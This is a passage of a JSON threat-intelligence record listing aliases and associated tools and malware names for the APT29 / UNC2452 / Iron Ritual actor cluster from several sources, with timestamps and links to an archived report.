			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434537,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8396ad0567d9f0acede51cfcf3e432727d4da43b.pdf",
		"text": "https://archive.orkl.eu/8396ad0567d9f0acede51cfcf3e432727d4da43b.txt",
		"img": "https://archive.orkl.eu/8396ad0567d9f0acede51cfcf3e432727d4da43b.jpg"
	}
}